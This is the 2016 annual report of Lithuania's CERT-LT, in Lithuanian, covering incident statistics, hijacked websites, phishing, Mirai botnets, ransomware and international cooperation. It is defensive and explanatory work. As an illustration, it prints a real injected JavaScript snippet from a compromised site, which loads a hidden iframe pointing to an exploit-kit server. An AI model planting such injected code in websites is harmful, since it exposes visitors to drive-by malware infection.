LIETUVOS RESPUBLIKOS RYŠIŲ REGULIAVIMO TARNYBOS TINKLŲ IR INFORMACIJOS SAUGUMO DEPARTAMENTO SAUGUMO INCIDENTŲ TYRIMŲ SKYRIUS (CERT-LT)
Lietuvos Respublikos ryšių reguliavimo tarnyba, vykdanti nacionalinio elektroninių ryšių tinklų ir informacijos saugumo incidentų tyrimo padalinio (CERT-LT) funkciją, apibendrina 2016 metų veiklos rezultatus. Ataskaitoje pateikiami praėjusių metų statistiniai rodikliai, aprašomos pagrindinės CERT-LT veiklos kryptys, apžvelgiami reikšmingesni įvykiai ir kibernetinių incidentų tendencijos. 2016 metais CERT-LT apdorojo 49 463 pranešimus apie incidentus, gautus iš Lietuvos elektroninių ryšių paslaugų teikėjų, užsienio CERT tarnybų, atliekančių tarptautinius incidentų tyrimus, ir iš Lietuvos interneto naudotojų. Palyginti su 2015 metais (41 583 atvejai), kibernetinių incidentų užregistruota 19 proc. daugiau. Pažymėtina, kad 17 proc. (arba 8 408) pranešimų apie incidentus buvo detaliai tiriami CERT-LT specialistų daugiausia tai informacinių sistemų užvaldymo, paslaugų trikdymo atakų bei kiti išskirtiniai atvejai, taip pat visų tipų incidentai, apie kuriuos pranešta CERT-LT interneto svetainėje (www.cert.lt/pranesti.html) arba elektroniniu paštu. Likusioji pranešimų apie incidentus dalis apdorota automatiniu būdu, perduodant informaciją apie incidentą bei rekomendacijas paslaugų teikėjams, kuriems priklauso su incidentu susiję IP adresai. Vertinant incidentus pagal IP adresus, 2016 metais buvo užfiksuoti 181 859 unikalūs IP adresai (atmetus dinaminius IP adresus, 98 774), dalyvavę kenkimo veikloje arba turėję saugumo spragų (2015 m. 146 045). 1-oje lentelėje ir 1-me paveiksle pateikiamos nagrinėtų pranešimų pagal tipus suvestinės. 1 lentelė. CERT-LT 2016 m. nagrinėti incidentai pagal jų tipus 2016 metų laikotarpis Apdorotų incidentų tipai I ketv. II ketv. III ketv. IV ketv. iš viso Kenkimo programinė įranga 2 887 2 531 2 805 2 989 11 212 Informacinių sistemų užvaldymas 2 902 2 290 2 383 3 098 10 673 E. paslaugų trikdymo atakos 10 36 11 4 61 E. duomenų klastojimas 112 147 153 143 555 Vientisumo pažeidimai 6 11 3 1 21 Įrenginių saugumo spragos 4 963 4 417 5 309 5 801 20 490 Neteisėtas el. duomenų naudojimas 1 0 0 0 1 Įvairaus pobūdžio 1 154 1 559 1 899 1 838 6 450 1
Įvairaus pobūdžio 13% Kenkimo programinė įranga 23% Įrenginių saugumo spragos 41% Sistemų užvaldymas 22% El. duomenų klastojimas 1% 1 pav. CERT-LT 2016 m. apdorotų pagrindinių incidentų tipų procentinės dalys Pagrindinės 2016 m. kibernetinio saugumo problemos Užvaldytos interneto svetainės Kasmet vis didėjanti Lietuvos kibernetinio saugumo problema yra užvaldytos informacinės sistemos, dažniausiai interneto svetainės. 2016 m. informacinių sistemų užvaldymo incidentų buvo tirta 10 673, t. y. 53 proc. daugiau nei 2015 m. (6 975 užvaldymai). Pagrindinės priežastys, kodėl šios kategorijos incidentų daugėja: Gausūs kompiuteriniai resursai ir didelė pasiekiama auditorija itin vilioja nusikaltėlius. Nepakankamas sistemų ir tinklalapių savininkų išprusimas saugumo srityje. Nepakankamas tinklalapių kūrėjų ir sistemų administratorių dėmesys saugumo klausimams ir menkas saugumo svarbos vertinimas. Didelis atviro kodo turinio valdymo sistemų populiarumas ir jų priežiūros trūkumas. 2
3500 3000 2500 2517 2902 2290 2383 3098 2000 1500 1494 1278 1686 1000 500 0 2015 I ketv. 2015 II ketv. 2015 III ketv. 2015 IV ketv. 2016 I ketv. 2016 II ketv. 2016 III ketv. 2016 IV ketv. 2 pav. Informacinių sistemų užvaldymo atvejai 2015 2016 m. Interneto svetainės bei kitos informacinės sistemos sulaukia daugybės lankytojų, tokiu būdu kibernetiniai nusikaltėliai potencialiai gauna progą pasiekti daugiau vartotojų, o tarnybinės stotys savo ruožtu suteikia gausių kompiuterinių resursų. Dauguma tinklalapių naudoja populiarias atvirojo kodo turinio valdymo sistemas. Laikui bėgant, jose arba jų papildiniuose (angl. plugins), kaip ir kiekvienoje programinėje įrangoje, atrandama įvairių saugumo spragų. Likimo valiai palikti neatnaujinti arba nesaugiai sukonfigūruoti tinklalapiai tampa lengvu grobiu kibernetiniams nusikaltėliams. Užvaldžius ar kitaip pažeidus šias sistemas, nusikaltėlių rankose jos tampa naudingais įrankiais ir išnaudojamos užkratui kenkimo programinei įrangai, brukalui toliau platinti, kitų sistemų užvaldymui bei kibernetinėms atakoms vykdyti. Atliktų tyrimų duomenys rodo, kad dauguma aptiktų užvaldymo atvejų atliekami automatizuotomis priemonėmis, pasitelkiant botų tinklus, įterpiant kenkimo kodą į prastai apsaugotas ar seniai neatnaujintas interneto svetaines, išnaudojant pasenusių turinio valdymo sistemų saugumo spragas ar pasinaudojant nesaugiu, dažnu atveju gamykliniu (angl. default) slaptažodžiu (pvz.: 123456, 1234567890, 0987654321, admin, slaptažodis (password), qwerty, įmonės pavadinimas ir pan.). 2016 m. interneto svetainės dažniausiai buvo užvaldomos ir įtraukiamos į Angler, RIG, Neutrino šeimų kenkimo programinės įrangos infrastruktūrą. Tai pažangūs įsilaužimo įrankių rinkiniai (angl. Exploit Kit (EK)), skirti pažeidžiamų tinklalapių užvaldymui ir kenkimo kodo platinimui automatizuoti. EK taikiniais tampa vartotojai, naudojantys nesaugią arba pasenusią programinę įrangą. Ši kenkimo programinė 3
įranga, veikianti tinklalapių serveriuose, išnagrinėja svetainės lankytojo sistemą, nustato jos pažeidžiamas vietas ir įsiskverbia konkrečioms spragoms pritaikytomis priemonėmis. Kenkimo programinis kodas dažnai pasislepia pažeisto tinklalapio serveryje taip, kad jo paprastai nemato nei svetainės lankytojai, nei administratoriai. Vienas iš užvaldytos svetainės veikimo pavyzdžių tinklalapyje įterpiamas Javascript pašalinis kodas: <script type="text/javascript" var zvdidj = document.createelement("iframe"); zvdidj.style.width = "13px"; zvdidj.style.height = "15px"; zvdidj.style.border = "0px"; zvdidj.frameborder = "0"; zvdidj.setattribute("frameborder", "0"); document.body.appendchild(zvdidj); zvdidj.src = "h p://b594e.s6h3eq.top/?xhindbsbkxzpcoc=l3skfprfjxzfgmsubnjda9gpkxcrqlph4sghk_ze4cvfj6-ezv9hrpaxqlkziv7wxuuxi58hlecl4tvxzrkcaegbra"; </script> Šis kodas vykdomas naudotojo naršyklėje tuo pačiu metu, kai atidaroma užvaldyta svetainė. Supaprastinta EK veikimo schema: Kibernetinis nusikaltėlis, naudodamas EK, pažeidžiamose svetainėse įterpia kenkimo Javascript kodą. Vartotojui apsilankius užvaldytoje svetainėje, Javascript kodas naršyklėje automatiškai sugeneruoja pašalinę nuorodą, į kurią nukreipia vartotojo naršyklę. Vartotojui atsidūrus kenkimo tinklalapyje, jame esantis kodas nukreipia vartotoją į EK serverį, kuris nuskaito informaciją apie vartotojo naršyklę bei jos įskiepius, Flash grotuvo, Java versijas, naudojamą antivirusinę programinę įrangą. EK pagal šią informaciją nustato, kokią spragą vartotojo įrenginyje galima išnaudoti, ir, pasinaudodamas ja, įdiegia vartotojo kompiuteryje kenkimo programinį kodą (dažniausiai tai būna išpirkos reikalaujantys (angl. Ransomware) virusai bei bankiniai Trojos arkliai (angl. banking Trojan). 4
Siekdami sumažinti užvaldymo grėsmę, tinklalapių savininkai ir kūrėjai turi rūpintis jų saugumu: apsaugoti svetainės valdymo skydą, naudoti sudėtingą prisijungimo slaptažodį ir periodiškai jį keisti, diegti turinio valdymo sistemos ir papildinių atnaujinimus, išdiegti nenaudojamus papildinius. Svetainių kūrėjai, kurie diegia populiarias turinio valdymo sistemas ( Wordpress, Joomla ir pan.), taip pat turi rūpintis tinkamu jų konfigūravimu. Kibernetinis sukčiavimas Kiekvienais metais vis daugiau interneto naudotojų patiria vis didesnių nuostolių dėl kibernetinių sukčiavimų. Šiais metais Lietuvoje buvo vykdoma didelio mąsto tikslinė sukčiavimo kampanija, nukreipta prieš konkrečias pareigas organizacijose užimančius asmenis įmonių finansininkus. Šios socialinės inžinerijos atakos, skirtingai nei ankstesni sukčiavimo atvejai Lietuvoje, buvo tikslinės, joms buvo pasirengta iš anksto, surinkti vieši duomenys, kurie vėliau panaudoti falsifikuotuose el. laiškuose. Kitas išskirtinis šių atakų bruožas kibernetinis nusikaltėlis išlaikydavo komunikaciją, kol pasiekdavo savo tikslą arba būdavo išaiškintas. Sukčių laiškai neturėjo grubių stiliaus ar sintaksės klaidų, kaip būdavo būdinga ankstesniuose sukčiavimo atvejuose laiškai parašyti taisyklinga lietuvių kalba. 3 pav. Socialinės inžinerijos pavyzdys suklastotas el. pašto adresas Plačiau apie tai: https://www.cert.lt/naujienos/lietuvoje_padaznejo_kibernetiniu_sukciavimo_atveju.html. 5
Praėjusiais metais ir toliau plačiai buvo taikomi senieji kibernetiniai sukčiavimo metodai, kuriais buvo bandoma išgauti svarbius interneto naudotojų duomenis. Toliau buvo siuntinėjami el. laiškai, parašyti netaisyklinga lietuvių kalba, neva iš banko, su nuoroda į banko tinklalapio klastotę ar pridedant prie laiško kenkimo bylą. Taip pat plito apgaulingas brukalas (angl. spam), kuriame buvo siūloma atverti prisegtą priedą (pvz., sąskaitą). Skirtingai nei 2015 m., ZIP formato priede slėpėsi ne EXE, o dažniausiai JavaScript, PDF ar DOC tipo failai. CERT-LT primena, kad, gavus bet kokį laišką, su priedais reikia elgtis atsargiai (pvz., juos galima prieš atveriant patikrinti www.virustotal.com). Nereikėtų atverti el. laiško priedų, jei siuntėjas jums nežinomas. Interneto svetainės ir 2016 metais buvo plačiai klastojamos siekiant apgauti interneto naudotojus ir išgaudi jų svarbius duomenis. 2016 m. CERT-LT ištyrė 555 pranešimus apie svetainių klastojimą (angl. phishing). 2015 m. jų buvo kone tiek pat 559. Kibernetiniai nusikaltėliai kuria interneto svetainių klastotes, siekdami išgauti įvairių internetinių paskyrų duomenis, finansinę ar kitą ypatingą informaciją. Dažniausiai buvo gaunami pranešimai apie suklastotą elektroninių mokėjimo sistemų svetainę PayPal, taip pat Facebook, Gmail bei Lietuvoje ir užsienyje veikiančių bankų svetaines. Apie klastotes CERT-LT informuoja Lietuvos ar užsienio interneto paslaugos teikėjus, tarptautinius partnerius ir tarnybinės stoties, iš kurios veikia tokios svetainės, administratorius. Visos žinomos klastotės buvo pašalintos. Prieš įvesdami savo asmeninius duomenis internetinėse svetainėse, pirmiausia įsitikinkite, kad svetainė nėra suklastota. Būtina atkreipti dėmesį į domeno vardą bei puslapyje esančių nuorodų adresus. E. bankininkystės sistemos visada naudoja saugų SSL ryšio protokolą, adreso pradžioje būtinai yra https ir galima patikrinti svetainės sertifikatą. Svarbu nepamiršti, kad bankai niekuomet neprašo pateikti ar keisti tik Jums žinomų banko internete ar mokėjimo kortelės slaptažodžių el. laiškais ar telefonu. 6
Saugumo spragos Saugumo spragos įrenginiuose, kurie paprastai priklauso fiziniams asmenims, ir toliau išlieka nemenka problema (20 490 pranešimų per 2016 m.). Ateityje ji dar labiau didės, nes buityje atsiranda vis daugiau įrenginių, turinčių ryšį su internetu (angl. Internet of Things, IoT), o kartu ir galimybes būti išnaudotiems. Tokie prietaisai įtraukiami į botnetus). Reikėtų pažymėti, kad dažniausiai šių prietaisų spragos nekelia tiesioginės grėsmės įrenginių savininkų duomenų saugumui, tačiau sudaro sąlygas piktavaliams naudoti įrenginius paskirstytosioms paslaugos trikdymo atakoms (angl. Distributed Denial of Service, DDoS) kaip atakų stiprintuvus. Kenkimo programinė įranga 2016 m. užfiksuota daug incidentų, susijusių su kenkimo programine įranga. CERT-LT ištyrė 11 212 kenkimo programinės įrangos panaudojimo atvejų (2015 m. 10 928). Vienas iš virusų kūrimo ir platinimo tikslų naudotojų kompiuterių įtraukimas į botnetus. Apie įtraukimą į botų tinklą kompiuterio savininkas ilgą laiką gali nieko nežinoti (kompiuteris veikia įprastai, kartais gali sulėtėti interneto ryšys). Antivirusinės programos turi euristinius analizatorius, kurie aptinka žalingą kodą pažeistame kompiuteryje, net jei jo nėra antivirusinės programos duomenų bazėje, analizuodami kodo veikimą. Tačiau pažymėtina, kad naują pavojingą kodą antivirusinės programos paprastai aptinka tik po tam tikro laiko. Užvaldytų kompiuterių (botų) tinklais buvo vykdomos įvairios kibernetinės atakos: kenkimo kodo ir brukalo platinimas, paslaugos trikdymo atakos ir pan. CERT-LT duomenimis, 2016 metais Lietuvoje kasdien buvo fiksuojama vidutiniškai 2 500 kompiuterių, kurie, savininkams nežinant, buvo valdomi nuotoliniu būdu. Tinklalapyje https://www.cert.lt/botnet registruojama ir skelbiama informacija apie botnetuose aptiktų kompiuterių aktyvumą. Praėjusių metų rudenį pasaulį sudrebino vienos iš didžiausių žinomų paslaugos trikdymo atakų. Jas sukėlė didžiulis botnetas Mirai. Naudojami šį tinklą, kibernetiniai nusikaltėliai vykdė itin galingas paslaugos trikdymo atakas, kurių įtaka jautėsi ir Lietuvos paslaugų teikėjų tinkluose. CERT-LT duomenimis, IV ketv. pabaigoje Lietuvoje buvo beveik 150 Mirai užkrėstų įrenginių (unikalių IP adresų). Mirai tai kenkimo kodas, kuris užvaldo pažeidžiamus daiktų interneto įrenginius, veikiančius Linux OS pagrindu. Tai gali būti internetinės kameros, kelvedžiai (angl. routers) ir pan. 2016 m. pabaigoje buvo žinoma apie 500 000 Mirai kodo užvaldytų įrenginių pasaulyje. Tokį 7
botnetą piktavaliai išnaudoja ne tik paslaugos trikdymo atakoms, bet kartu ir skenuoja interneto IP adresų erdvę, ieškodami naujų aukų, bandydami prisijungti prie jų su turima gamyklinių slaptažodžių lentele. Kitas paplitęs kenkimo programinės įrangos panaudojimo tikslas išgauti pinigus platinant užšifruojančius ir išpirkos reikalaujančius virusus. Praėjusiais metais CERT-LT fiksavo padidėjusį vartotojų, nukentėjusių nuo šio tipo virusų, skaičių. Tokio tipo kenkimo programos užšifruoja kompiuterio duomenis ir reikalauja išpirkos virtualia valiuta bitkoinais. Šifravimui naudojami itin sudėtingi algoritmai, todėl pačiam iššifruoti duomenis tikimybė labai maža. Kai kuriems tokio tipo išpirkos reikalaujantiems virusams jau yra sukurti nemokami failų iššifravimo įrankiai, tad tai bene vienintelė galimybė atgauti duomenis, jeigu nėra atsarginių kopijų. Bet atrakinamų viruso versijų dar nedaug, o nusikaltėliai nuolat kuria naujas, todėl svarbu išlikti budriems. Naudotojai, norėdami sumažinti kompiuterio užkrėtimo virusu tikimybę, turi laikytis kelių paprastų taisyklių: nespausti ant įtartinų nuorodų, neatverti failų, gautų iš nepažįstamų el. paštu, per Skype ir pan. Būtina turėti antivirusinę programą (yra nemokamų), nuolat atnaujinti savo operacinę sistemą ir taikomąsias programas, daryti atsargines duomenų kopijas ir naudoti sudėtingus prisijungimo slaptažodžius. Suaktyvėjo ir kenkimo kodai, nutaikyti į mobiliuosius įrenginius. Dažniausiai užvaldytose svetainėse kibernetiniai nusikaltėliai paslepia Javascript kenkimo kodą, kuris, naršant tokioje svetainėje su pažeidžiamu mobiliu įrenginiu, naršyklėje atidaro naują langą su specialiai paruoštu kodu, kuris be vartotojo žinios įrenginyje įdiegia kenkimo programinę įrangą. Dažniausiai tokio kenkimo programinio kodo paskirtis pavogti vartotojo asmeninius duomenis, pvz., aktyvių paskyrų ( Gmail, Facebook, debesijos saugyklų) prisijungimo ar kontaktinius duomenis. Kenkimo programinio kodo buvimą mobiliajame įrenginyje dažniausiai išduoda keista įrenginio elgsena naršyklėje atsidarinėja langai su reklaminio ar pornografinio pobūdžio tinklalapiais, telefono kontaktuose esantys asmenys gauna įvairias žinutes, kurių niekas nesiuntė, pastebimai sumažėja akumuliatoriaus veikimo laikas ar išauga judriojo ryšio operatoriaus sąskaita. 8
Pastebėjus šiuos ir panašius mobiliojo įrenginio pasikeitimus, CERT-LT rekomenduoja atlikti patikrą mobiliesiems įrenginiams pritaikyta antivirusine programa ir atstatyti įrenginio gamyklinius parametrus. Prieš tai būtina pasidaryti svarbių duomenų kopiją. Kitų tipų incidentai 2016 metais CERT-LT ištyrė 61 pranešimą apie paslaugos trikdymo (angl. Denial of Service, DoS) atakas (2015 m. buvo ištirta 50 tokių pranešimų.) Šių atakų padidėjimą lėmė 2016 m. II ketv. įvykiai, kai vyko nuolatinės DDoS atakos, nukreiptos prieš Lietuvos Respublikos institucijų, žiniasklaidos, bankų ir privačiojo sektoriaus tinklalapius. Šių atakų metu piktavaliai naudojo įvairius atakų būdus, apsunkinančius interneto svetainių administratorių gynybos galimybes ir šių atakų valdymą. Siekdami padėti suvaldyti vykdytas atakas, CERT-LT specialistai teikė rekomendacijas užvaldytų įrenginių ir pažeistų tinklalapių administratoriams ir savininkams. Taip pat teiktos rekomendacijos elektroninės informacijos prieglobos (angl. hosting) paslaugas teikiančioms įmonėms, veiksmai koordinuoti su interneto paslaugų teikėjais ir kitų valstybių CERT tarnybomis. Praėjusiais metais buvo užregistruotas 21 ryšių tinklų vientisumo pažeidimas, iš jų 2 atvejai buvo pakankamai rimti, apie kuriuos buvo pranešta Europos tinklų ir informacijos apsaugos agentūrai ENISA. Įvairaus pobūdžio incidentų, nepriskiriamų prie jau minėtų incidentų tipų, iš viso buvo 6 450. Neteisėto el. duomenų naudojimo atvejų iš esmės nebuvo. Apibendrindami pateikiame CERT-LT registruotų kibernetinių incidentų nuo 2010 m. iki 2016 m. suvestinę. 9
60000 50000 40000 36136 41583 49463 30000 20000 21860 21416 25337 10000 10050 0 2010 m. 2011 m. 2012 m. 2013 m. 2014 m. 2015 m. 2016 m. 4 pav. CERT-LT 2010 2016 m. apdorotų incidentų suvestinė Bendradarbiavimas 2016 m. vasarą Ryšių reguliavimo tarnyba, kurioje veikia CERT-LT, ir Kauno technologijos universiteto Informacinių technologijų departamento Interneto paslaugų centras pasirašė susitarimą dėl bendradarbiavimo elektroninės informacijos prieglobos paslaugų saugumo ir kibernetinių incidentų prevencijos srityje. Pasirašyto bendradarbiavimo susitarimo tikslas didinti bendrą visuomenės saugumo lygį informacinių technologijų srityje, mažinti elektroninėje erdvėje nukentėjusių interneto naudotojų bei užvaldytų ir pažeidžiamų įrenginių skaičių, siekiant apsaugoti interneto naudotojų duomenis, asmeninę informaciją ir turtą. 2016 m. rugpjūčio mėn. Ryšių reguliavimo tarnyba ir Keitimosi duomenimis agentūra prie Gruzijos teisingumo ministerijos (KDA) pasirašė susitarimą dėl bendradarbiavimo kibernetinių incidentų prevencijos ir tyrimo srityje. Šio bendradarbiavimo susitarimo tikslas kurti tarpinstitucinį bendradarbiavimą, sutelkti bendras pastangas bei techninius, finansinius ir žmogiškuosius išteklius, kad rimtų incidentų atveju būtų užtikrinti tinkami atsakomieji veiksmai. Šalys bendradarbiaus tirdamos tarptautinius kibernetinius incidentus, dalysis patirtimi, keisis informacija apie incidentus. CERT-LT kartu su Lietuvos policija dalyvavo dviejose tarptautinėse švietimo kampanijose: dėl kenkimo programų mobiliuosiuose renginiuose ir dėl neatsakingo jaunimo požiūrio į kompiuterinius nusikaltimus ir galimą riziką. 10
Plačiau apie šias kampanijas: https://www.cert.lt/naujienos/tarptautines_operacijos_taikiniai_-_jauni_ddos_kib.html https://www.cert.lt/naujienos/kaip_apsaugoti_nuo_kenkimo_programu_mobiliuosius_i.html Svarbus CERT-LT veiklos aspektas yra apsikeitimas kibernetinio saugumo informacija. Tam naudojamos ir kuriamos vis našesnės saugumo informacijos automatizuoto apdorojimo ir paskirstymo priemonės. 5-me paveiksle pateikiami 6 pagrindiniai saugumo pranešimų gavėjai ir siuntėjai, esantys tiek Lietuvoje, tiek užsienyje. 11
40000 35000 35221 30000 25000 20000 15000 10000 5000 0 1359 578 Prieglobos įmonės (LT) 2383 4323 IPT (LT) Organizacijos (LT) Valstybės institucijos 1814 420 257 409 458 525 Gyventojai 6196 Kitos CERT grupės gavėjas siuntėjas 5 pav. CERT-LT 2016 m. saugumo pranešimų pagrindiniai siuntėjai ir gavėjai Pastaba. Kitos CERT grupės yra Lietuvos ir užsienio CERT'ai, įskaitant nacionalinius. Cyber Europe 2016 Praėjusiais metais visoje Europoje vyko itin didelio masto kibernetinio saugumo pratybos Cyber Europe 2016. Šiai pratybas organizavo Europos tinklų ir informacijos saugumo agentūra ENISA bei šalys narės. CERT-LT atstovai buvo šių pratybų nacionaliniai planuotojai ir moderatoriai. Pratybos prasidėjo šių metų balandžio mėn. Svarbiausias jų etapas vyko spalio 13 14 dienomis, kuomet specialistai turėjo suvaldyti menamą kibernetinę krizę ir apsaugoti Europos skaitmeninę erdvę. Tai didžiausios ir sudėtingiausios iki šiol vykusios kibernetinio saugumo pratybos Europos Sąjungoje, kuriose dalyvavo kibernetinio saugumo specialistai iš daugiau kaip 300 organizacijų iš 30 Europos Sąjungos ir EFTA šalių. Šių pratybų tikslas patikrinti bendradarbiavo procesus Europos Sąjungos ir nacionaliniu lygiu, didinti kvalifikacinius gebėjimus kibernetinio saugumo srityje. Pratybas sudarė du etapai. Pirmajame etape dalyvavo apie 30 Lietuvos organizacijų (valstybinės institucijos, CERT tarnybos, interneto paslaugų ir debesų kompiuterijos paslaugų teikėjai, kiti kibernetinės saugos specialistai). Antrajame pagrindiniame etape CERT-LT ekspertai kartu su Lietuvos interneto ir debesų kompiuterijos paslaugų teikėjais AB Teo LT, UAB Baltnetos komunikacijos, VĮ Infostruktūra, LITNET CERT ir 12
tarptautinių organizacijų kolegomis turėjo suvaldyti itin sudėtingus ir pesimistiškus scenarijus, kurie vyko kibernetinių atakų metu. Dalyviai atliko kompiuterių užvaldymo techninės ekspertizės užduotis, organizavo krizių valdymo komandas, rengė pranešimus spaudai, tyrė informacijos nutekinimo ir kitus incidentus. Pasak RRT direktoriaus Felikso Dobrovolskio, šios pratybos buvo ypatingai svarbios ir sudėtingos tiek pasirengimo joms procese, tiek jų vykdymo metu. Dėl glaudaus ir profesionalaus bendradarbiavimo nacionaliniu ir tarptautiniu lygiu Lietuvos kibernetinio saugumo specialistai pasirodė tinkamai pasirengę bendradarbiauti, reaguojant į kritines situacijas, spręsti ir valdyti sudėtingiausius incidentus, atakas, nukreiptas prieš elektroninių ryšių tiekėjus ir vartotojus. Pratybos taip pat padėjo atskleisti tam tikrus probleminius aspektus, kurie bus tobulinami ateityje. Visuomenės švietimas ir pagalba CERT-LT daug svarbios informacijos skelbia savo tinklalapyje. Atnaujintoje interneto svetainėje www.cert.lt, kuri yra pritaikyta mobiliesiems įrenginiams ir pasiekiama naudojant IPv6 protokolą, galima: kreiptis pagalbos, įvykus kibernetiniam incidentui, pasitikrinti savo kompiuterinę įrangą dėl saugumo spragų ir neleistinos veiklos, rasti kenkimo programų aprašymus, pašalinimo instrukcijas bei saugumo rekomendacijas, pranešti apie vykdomą nusikalstamą kibernetinę veiklą, skaityti naujienas, susijusias su IT saugumu, peržiūrėti kaupiamą statistiką (tiek grafikus, tiek ataskaitas), sužinoti pagrindinius CERT-LT veiklos uždavinius, susipažinti su teisės aktais, reglamentuojančiais kibernetinį saugumą. Naudotojams, susidūrusiems su tinklų ir informacijos saugumo problemomis, patariama nedelsiant kreiptis į savo interneto paslaugų teikėją, o jei šis problemų išspręsti negali, informuoti apie tai CERT-LT užpildant formą tinklalapyje 13
www.cert.lt/pranesti. Daugiau informacijos interneto naudotojams apie saugumą internete prieinama svetainėje www.esaugumas.lt. Įspėjimus apie kibernetinius incidentus bei trumpas kibernetinio saugumo naujienas CERT-LT skelbia ir socialiniame tinkle Twitter. Jeigu norite sužinoti IT saugumo aktualijas, prisijunkite prie mūsų adresu https://twitter.com/cert_lt. 14